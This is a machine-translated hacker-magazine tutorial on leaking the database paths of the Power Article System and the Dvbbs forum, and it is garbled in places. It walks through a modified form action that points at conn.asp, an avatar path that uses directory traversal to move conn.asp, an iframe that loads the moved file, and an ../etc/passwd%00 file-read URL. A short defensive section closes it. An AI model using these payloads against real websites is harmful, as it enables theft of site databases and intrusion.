From: www.4ngel.net E-mail: sniper@77169.com This article has been published in the "black guest XFile" ######################################Preface As the core part of a website, the importance of the database is self-evident. network administrators are also painstaking to rename the database and add special symbols to increase security. However, the database paths of some security sites have been found and downloaded recently, that is, the popular "Storm Database" technology discussed recently. I have also studied this technology with my friends in zihuan and Heike XFile. Although there are still not many research results, I hope it can play a role of turning a role into a role. Next I will take two systems for instance analysis:
Dynamic Article System Generally, each website program file has a file that connects to the data (usually Conn. ASP), of course, the file name and path are not fixed, some are under the root directory of the site, some are placed in a dedicated folder, usually the folder name is Inc, and the file name is Conn. ASP. If we associate this with a brute-force database, people usually think of accessing this file to obtain information about the database. In fact, directly accessing this file will not get the information we want, therefore, it is necessary to combine some vulnerabilities to achieve the goal of brute-force databases. First of all, let me briefly introduce this program. The power article system is divided into commercial SQL version and free access version. Here we test the access version. The conn. asp file of the program is used to connect to the database. Under the/INC directory, the database file is under the/database directory. Connect to the database using the relative path: DB = "database/adsfkldfogowerjnokfdslwejhdfsjhk. mdb" The database path leakage hazard of the Power Article system should be caused by the negligence of programmers. As the conn. asp file contains hidden risks, attackers can obtain the database path. Vulnerability discoverer: every day (that is, the mm of the hacker x forum named Sohu), involved researchers: Strange dog, iceyes, sniper. (Vulnerability analysis can see http://www.hackerxfiles.net/bbs/dispbbs.asp? Boardid = 4 & id = 27293 ). At the beginning, we thought that the editor. asp file lacked sufficient verification, but then we analyzed it and found that it was not a problem with editor. asp. Every day, you can use editor. asp to view the server's returned information. Let's demonstrate the attack process. Open this page in IE to see what the page can do (1 ). Figure 1 Obviously, this file is used to edit the content of an article. Although there is no other permission, We can edit and change the HTML page. Click "original code" to find the following content:
<Form name = login onsubmit = "Return checkform ();" Action = admin_chklogin.asp method = post target = _ parent> <Table cellspacing = 0 cellpadding = 0 width = 585 align = center border = 0> |
This is the content that is passed to the admin_chklogin.asp file for authentication on this page. Next we need to change it to the conn. asp file:
<Form name = login onsubmit = "Return checkform ();" Action = http://www.target.com/inc/conn.asp method = post target = _ parent> <Table cellspacing = 0 cellpadding = 0 width = 585 align = center border = 0> |
After modification, click "preview". What do you see? See it! The database path is displayed (figure 2 )! Figure 2 What is the reason? Let's take a look at this:
'D:/web/power/access/INC/database/adsfkldfogowerjnokfdslwejhdfsjhk. mdb 'is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored. |
Directory structure I have already mentioned that the INC directory exists in the main directory (used to store Conn. ASP) and database directory (database file, that is, adsfkldfogowerjnokfdslwejhdfsjhk. MDB), since the database directory is not under the INC directory, the/INC/database/is displayed when the database is exposed just now. This is an oversight of the writing staff. Since INC and database belong to the same directory, when we use editor. ASP connection access Conn. ASP, because the database is not in the INC directory, and the system confirms that you are requesting/INC/database/adsfkldfogowerjnokfdslwejhdfsjhk. the MDB file does not actually exist. If the system cannot find this file, an error will be reported. To solve this problem, the most direct method is to put conn. asp in the upper-level directory of the database file or the same directory as the dynamic network. Mobile Network Forum Based on the analysis in the above dynamic article system, we can find the program with the problem of database path leakage: 1 conn. asp is not in the same directory as the file calling it (such as index. asp. 2 conn. asp uses a relative path to connect to the database. Knowing the principles of the vulnerability, it is not difficult to understand how the Internet gets the database. Some time ago, attackers found a major vulnerability in the online forum, which can transfer any file. By exploiting this vulnerability, you can delete the Forum files of others without any permissions. When I discussed this issue with zihuan that day, I suddenly thought of a method, as long as we combined this vulnerability with our dynamic article to get the database method, we can easily think of the database method of the online forum. Let's take a look at what we should do with the dynamic network. The mobile network vulnerability lies in mymodify. on the ASP file, it is too hasty in processing part of the User-Defined avatar, we can use /. /to jump to the directory and move the file. See the following code:
'****************** 'Filter and rename the uploaded header Image If CINT (forum_setting (7) = 1 then On Error resume next Dim objfso, upfilename, newfilename Dim upface, memberid Set rs1_conn.exe cute ("select userid, face from [user] Where userid =" & userid) Memberid = RS (0) Upface = trim (RS (1 )) Newfilename = "" Upfilename = Split (upface ,"/") If ubound (upfilename) = 1 and upfilename (0) = "uploadface" then If instr (upfilename (1), "_") = 0 then Newfilename = "uploadface/" & memberid & "_" & upfilename (1)/change the profile picture to uploadface/user ID Set objfso = server. Createobject ("scripting. FileSystemObject ") If objfso. fileexists (server. mappath (upface) then Objfso. movefile "" & server. mappath (upface) & "", "" & server. mappath (newfilename )&"" End if If err. Number = 0 then Conn.exe cute ("Update [user] Set face = '" & newfilename & "'where userid =" & userid) End if Set objfso = nothing End if End if Rs. Close Set rs = nothing End if 'Filter and rename the uploaded header Image '**************** |
Let's look at this sentence:
Newfilename = "uploadface/" & memberid & "_" & upfilename (1)/newfilename = change the profile picture to another part of uploadface/user id_upfilename Let's look at it again: If objfso. fileexists (server. mappath (upface) then Objfso. movefile "" & server. mappath (upface) & "", "" & server. mappath (newfilename )&"" /See no? The most important part is: if the file represented by upface exists, move the file and rename it! |
Now, the code analysis is complete. Let's see how we can use it. After registering a user and entering the basic information modification page, the key part is coming. Do you still remember to jump to the directory to view information when you are playing with showfiles? Similar to the following URL, we use ../to jump to the directory to view the passwd file. Submit:
Http://www.target.com/show.php? File =.../etc/passwd % 00 |
I believe everyone knows the roles of/,/,... and. What we need to do is to jump to the directory and transfer conn. asp. Add the following sentence to the custom avatar address:
Uploadface/./../Conn. asp (case sensitive) |
I have analyzed the code before. The meaning of this sentence should be understood. We point the "Avatar" Address to the conn. asp of the parent directory. Because upface meets its judgment condition, it will set Conn. the ASP file is transferred to the uploadface Directory, which meets the first condition of the dynamic article system. Generally, relative paths are used at home, so we only need to call this file to know the database path. Add the following content to a new HTML file:
<IFRAME marginwidth = 0 marginheight = 0 src = "http://www.target.com/dvbbs/uploadFace/conn.asp" frameborder = 0 width = 500 scrolling = noshade Height = 400> </iframe> |
Open the HTML file and check whether the database path is available! (3) Figure 3 Security It seems that the problem lies in conn. asp itself. To ensure security, we have to deal with it. The most stupid way is to rename it so that others cannot guess the path. But it needs to be called by many files and changed elsewhere. When we use the relative path, the database path will change with the file calling conn. asp, resulting in an error. So we can use the absolute path to connect to the database, so that no matter who calls the conn. ASP database, the path remains unchanged. When I tested the mobile network vulnerability, I found that some of the newer versions, that is, if the file was successfully moved, the database path could not be exposed. However, some versions 6.0 are valid. It seems that the new version of the dynamic network forum has performed special processing on Conn. asp. We compared two different conn. asp and found that the new conn. ASP includes the following sentence:
In this way, the database information is not prompted when an error occurs! Of course, it would be better to combine the above methods! |